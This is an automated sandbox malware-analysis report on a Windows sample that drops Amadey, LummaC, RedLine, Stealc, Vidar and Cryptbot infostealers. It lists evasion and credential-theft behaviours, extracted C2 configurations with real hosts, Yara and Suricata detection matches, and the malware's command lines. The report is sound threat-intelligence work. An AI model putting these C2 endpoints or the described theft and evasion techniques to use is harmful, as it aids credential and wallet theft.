Edit tour

Windows Analysis Report
L8ChrKrbqV.exe

Overview

General Information

Sample name:	L8ChrKrbqV.exe renamed because original name is a hash value
Original sample name:	c2412016fef34a18747d01a482224c2a.exe
Analysis ID:	1604943
MD5:	c2412016fef34a18747d01a482224c2a
SHA1:	36d410eebd1f7cd52967df89087614a8080d0205
SHA256:	ecf980fee4a4a99862b7bb3d05856cbdb9b68d4bc778dad93a32e48f3274cced
Tags:	exeuser-abuse_ch
Infos:

Detection

Amadey, Cryptbot, LummaC Stealer, RedLine, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected Cryptbot

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected RedLine Stealer

Yara detected Stealc

Yara detected Vidar stealer

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Joe Sandbox ML detected suspicious sample

Leaks process information

Machine Learning detection for dropped file

Machine Learning detection for sample

Monitors registry run keys for changes

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Browser Started with Remote Debugging

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

L8ChrKrbqV.exe (PID: 7372 cmdline: "C:\Users\user\Desktop\L8ChrKrbqV.exe" MD5: C2412016FEF34A18747D01A482224C2A)

XAWR7RW45EPTK4VDBU7Q3V5ELG.exe (PID: 7188 cmdline: "C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe" MD5: 0D138418B855EA7C6DD221F31B198056)

chrome.exe (PID: 3688 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 3128 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2208,i,3989964441528239417,17978033501592239035,262144 /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

msedge.exe (PID: 5068 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7404 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2096,i,5225765987190299877,16873338386739296826,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe (PID: 6188 cmdline: "C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe" MD5: FAD1341848452EE30734EBDD88AC7F42)

skotes.exe (PID: 7364 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: FAD1341848452EE30734EBDD88AC7F42)

skotes.exe (PID: 1384 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: FAD1341848452EE30734EBDD88AC7F42)

msedge.exe (PID: 7408 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 5456 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2244,i,2454103829531632188,12512779967971842142,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

skotes.exe (PID: 4296 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: FAD1341848452EE30734EBDD88AC7F42)

d40ec5ca11.exe (PID: 2916 cmdline: "C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe" MD5: 1A9D529AEB175E5F1F8BB8B2984B78BC)

cab7dbccac.exe (PID: 7444 cmdline: "C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe" MD5: 496874C3C2D8F11FF64C5FB9AB7B88D2)

ab13ed0cb0.exe (PID: 7852 cmdline: "C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe" MD5: F662CB18E04CC62863751B672570BD7D)

conhost.exe (PID: 2528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.lexfo.fr/StealC_malware_analysis_part1.html https://blog.lexfo.fr/StealC_malware_analysis_part2.html https://blog.lexfo.fr/StealC_malware_analysis_part3.html https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.115/c4becf79229cb002.php", "Botnet": "kira"}

Threatname: LummaC

{"C2 url": "https://rampnatleadk.click/api", "Build Version": "fBkCmu--labinstall"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Threatname: Cryptbot

{"C2 list": ["home.fivegg5th.top", ".1.1home.fivegg5th.top", "a.dnspod.comh.top", "gPhome.fivegg5th.top"]}

Threatname: RedLine

{"C2 url": ["103.84.89.222:33791"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.1386911900.0000000001134000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001A.00000003.2487463135.0000000000C14000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1883190413.000000000127A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.1557809992.0000000004C00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000018.00000003.2166199712.0000000004780000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000A.00000002.1553717755.0000000000851000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000C.00000002.1600338181.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000C.00000003.1556622656.0000000005270000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000009.00000002.1882078107.0000000000491000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000009.00000002.1883190413.000000000121E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.1396974908.000000000114D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.1600329800.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001B.00000003.2403419318.00000000052B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000003.2403419318.00000000052B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001B.00000003.2403419318.00000000052B0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000000.00000003.1369543614.000000000118F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000002.2525835050.00000000003B2000.00000040.00000001.01000000.00000011.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000002.2525835050.00000000003B2000.00000040.00000001.01000000.00000011.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001B.00000002.2525835050.00000000003B2000.00000040.00000001.01000000.00000011.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000009.00000003.1483989893.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000009.00000002.1882078107.000000000055C000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1386517009.0000000001134000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000003.1511295315.0000000004B70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: L8ChrKrbqV.exe PID: 7372	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: L8ChrKrbqV.exe PID: 7372	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: L8ChrKrbqV.exe PID: 7372	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe PID: 7188	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe PID: 7188	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe PID: 7188	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe PID: 7188	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: d40ec5ca11.exe PID: 2916	JoeSecurity_Cryptbot_1	Yara detected Cryptbot	Joe Security
Process Memory Space: cab7dbccac.exe PID: 7444	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: cab7dbccac.exe PID: 7444	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cab7dbccac.exe PID: 7444	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: cab7dbccac.exe PID: 7444	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: ab13ed0cb0.exe PID: 7852	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ab13ed0cb0.exe PID: 7852	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: ab13ed0cb0.exe PID: 7852	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x77452:$a4: get_ScannedWallets 0x83810:$a4: get_ScannedWallets 0x762f9:$a5: get_ScanTelegram 0x826b7:$a5: get_ScanTelegram 0x770db:$a6: get_ScanGeckoBrowsersPaths 0x83499:$a6: get_ScanGeckoBrowsersPaths 0x74f8c:$a7: <Processes>k__BackingField 0x8134a:$a7: <Processes>k__BackingField 0x724bf:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x7e87d:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x748c0:$a9: <ScanFTP>k__BackingField 0x80c7e:$a9: <ScanFTP>k__BackingField
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 35 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
27.2.ab13ed0cb0.exe.3b0000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
27.2.ab13ed0cb0.exe.3b0000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
27.2.ab13ed0cb0.exe.3b0000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x137ca:$a4: get_ScannedWallets 0x12628:$a5: get_ScanTelegram 0x1344e:$a6: get_ScanGeckoBrowsersPaths 0x1126a:$a7: <Processes>k__BackingField 0xf17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x10b9e:$a9: <ScanFTP>k__BackingField
27.2.ab13ed0cb0.exe.3b0000.0.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x11bcb:$gen01: ChromeGetRoamingName 0x11bff:$gen02: ChromeGetLocalName 0x11c28:$gen03: get_UserDomainName 0x13e67:$gen04: get_encrypted_key 0x133e3:$gen05: browserPaths 0x1372b:$gen06: GetBrowsers 0x13061:$gen07: get_InstalledInputLanguages 0x1084f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9318:$spe6: windows-1251, CommandLine: 0x145bd:$spe9: wallet 0xf00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xf107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xf464:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xf571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xf6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xf098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xf0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xf25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xf59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xf639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
27.2.ab13ed0cb0.exe.3b0000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1068a:$u7: RunPE 0x13d41:$u8: DownloadAndEx 0x9330:$pat14: , CommandLine: 0x13279:$v2_1: ListOfProcesses 0x1088b:$v2_2: get_ScanVPN 0x1092e:$v2_2: get_ScanFTP 0x1161e:$v2_2: get_ScanDiscord 0x1260c:$v2_2: get_ScanSteam 0x12628:$v2_2: get_ScanTelegram 0x126ce:$v2_2: get_ScanScreen 0x13416:$v2_2: get_ScanChromeBrowsersPaths 0x1344e:$v2_2: get_ScanGeckoBrowsersPaths 0x13709:$v2_2: get_ScanBrowsers 0x137ca:$v2_2: get_ScannedWallets 0x137f0:$v2_2: get_ScanWallets 0x13810:$v2_3: GetArguments 0x11ed9:$v2_4: VerifyUpdate 0x167ea:$v2_4: VerifyUpdate 0x13bca:$v2_5: VerifyScanRequest 0x132c6:$v2_6: GetUpdates 0x167cb:$v2_6: GetUpdates
12.2.skotes.exe.5b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
10.2.NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe.850000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
24.2.skotes.exe.5b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
13.2.skotes.exe.5b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 4 entries

Sigma Signatures

System Summary

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe", ParentImage: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, ParentProcessId: 7188, ParentProcessName: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 3688, ProcessName: chrome.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:55:34.640347+0100	2028371	3	Unknown Traffic	192.168.2.10	49704	104.21.18.116	443	TCP
2025-02-02T07:55:35.324030+0100	2028371	3	Unknown Traffic	192.168.2.10	49705	104.21.18.116	443	TCP
2025-02-02T07:55:36.618998+0100	2028371	3	Unknown Traffic	192.168.2.10	49707	104.21.18.116	443	TCP
2025-02-02T07:55:42.449712+0100	2028371	3	Unknown Traffic	192.168.2.10	49743	104.21.18.116	443	TCP
2025-02-02T07:55:43.643158+0100	2028371	3	Unknown Traffic	192.168.2.10	49754	104.21.18.116	443	TCP
2025-02-02T07:55:45.218596+0100	2028371	3	Unknown Traffic	192.168.2.10	49765	104.21.18.116	443	TCP
2025-02-02T07:55:46.685506+0100	2028371	3	Unknown Traffic	192.168.2.10	49776	104.21.18.116	443	TCP
2025-02-02T07:55:48.853703+0100	2028371	3	Unknown Traffic	192.168.2.10	49791	104.21.18.116	443	TCP
2025-02-02T07:57:21.464176+0100	2028371	3	Unknown Traffic	192.168.2.10	50025	104.21.79.9	443	TCP
2025-02-02T07:57:22.099533+0100	2028371	3	Unknown Traffic	192.168.2.10	50027	104.21.79.9	443	TCP
2025-02-02T07:57:23.647704+0100	2028371	3	Unknown Traffic	192.168.2.10	50030	104.21.79.9	443	TCP
2025-02-02T07:57:31.556299+0100	2028371	3	Unknown Traffic	192.168.2.10	50035	104.21.79.9	443	TCP
2025-02-02T07:57:33.324604+0100	2028371	3	Unknown Traffic	192.168.2.10	50036	104.21.79.9	443	TCP
2025-02-02T07:57:35.379104+0100	2028371	3	Unknown Traffic	192.168.2.10	50039	104.21.79.9	443	TCP
2025-02-02T07:57:37.048598+0100	2028371	3	Unknown Traffic	192.168.2.10	50041	104.21.79.9	443	TCP

ET MALWARE CryptBot CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:57:19.408312+0100	2059018	1	A Network Trojan was detected	192.168.2.10	50024	94.156.102.240	80	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:55:34.818008+0100	2054653	1	A Network Trojan was detected	192.168.2.10	49704	104.21.18.116	443	TCP
2025-02-02T07:55:35.825590+0100	2054653	1	A Network Trojan was detected	192.168.2.10	49705	104.21.18.116	443	TCP
2025-02-02T07:55:49.320884+0100	2054653	1	A Network Trojan was detected	192.168.2.10	49791	104.21.18.116	443	TCP
2025-02-02T07:57:21.620402+0100	2054653	1	A Network Trojan was detected	192.168.2.10	50025	104.21.79.9	443	TCP
2025-02-02T07:57:22.624280+0100	2054653	1	A Network Trojan was detected	192.168.2.10	50027	104.21.79.9	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:55:34.818008+0100	2049836	1	A Network Trojan was detected	192.168.2.10	49704	104.21.18.116	443	TCP
2025-02-02T07:57:21.620402+0100	2049836	1	A Network Trojan was detected	192.168.2.10	50025	104.21.79.9	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:55:35.825590+0100	2049812	1	A Network Trojan was detected	192.168.2.10	49705	104.21.18.116	443	TCP
2025-02-02T07:57:22.624280+0100	2049812	1	A Network Trojan was detected	192.168.2.10	50027	104.21.79.9	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:57:21.464176+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.10	50025	104.21.79.9	443	TCP
2025-02-02T07:57:22.099533+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.10	50027	104.21.79.9	443	TCP
2025-02-02T07:57:23.647704+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.10	50030	104.21.79.9	443	TCP
2025-02-02T07:57:31.556299+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.10	50035	104.21.79.9	443	TCP
2025-02-02T07:57:33.324604+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.10	50036	104.21.79.9	443	TCP
2025-02-02T07:57:35.379104+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.10	50039	104.21.79.9	443	TCP
2025-02-02T07:57:37.048598+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.10	50041	104.21.79.9	443	TCP

ET MALWARE RedLine Stealer - CheckConnect Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:55:28.313983+0100	2045000	1	Malware Command and Control Activity Detected	103.84.89.222	33791	192.168.2.10	50038	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:57:16.398107+0100	2044696	1	A Network Trojan was detected	192.168.2.10	50021	185.215.113.43	80	TCP
2025-02-02T07:57:21.726777+0100	2044696	1	A Network Trojan was detected	192.168.2.10	50026	185.215.113.43	80	TCP
2025-02-02T07:57:26.991177+0100	2044696	1	A Network Trojan was detected	192.168.2.10	50032	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rampnatleadk .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:57:20.938094+0100	2059149	1	Domain Observed Used for C2 Detected	192.168.2.10	60622	1.1.1.1	53	UDP

